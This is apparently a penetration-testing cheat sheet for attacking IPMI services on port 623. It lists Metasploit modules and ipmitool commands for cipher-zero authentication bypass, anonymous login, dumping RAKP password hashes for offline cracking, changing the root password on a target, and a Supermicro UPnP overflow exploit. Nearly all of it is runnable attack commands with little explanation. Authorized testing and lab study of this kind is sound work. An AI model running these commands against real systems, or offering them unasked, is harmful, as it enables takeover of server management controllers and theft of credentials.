623) IPMI

  • Enumerations

## ------------------| Version Detection
use auxiliary/scanner/ipmi/ipmi_version

  • Vulnerabilities

## ------------------| Change password for root user
ipmitool -I lanplus -C 0 -H 10.10.11.124 -U root -P root user set password 2 newpassword

## ------------------| IPMI Authentication Bypass via Cipher 0
use auxiliary/scanner/ipmi/ipmi_cipher_zero
ipmitool -I lanplus -C 0 -H 10.10.11.124 -U root -P root user list   # -C 0 selects cipher suite 0; dumps the list of users

## ------------------| IPMI 2.0 RAKP Authentication Remote Password Hash Retrieval
use auxiliary/scanner/ipmi/ipmi_dumphashes
set OUTPUT_HASHCAT_FILE cat-hash
set OUTPUT_JOHN_FILE john-hash
ipmitool -I lanplus -C 0 -H 10.10.11.124 -U root -P root user list

## ------------------| IPMI Anonymous Authentication
ipmitool -I lanplus -H 10.10.11.124 -U '' -P '' user list

## ------------------| Supermicro IPMI UPnP
use exploit/multi/upnp/libupnp_ssdp_overflow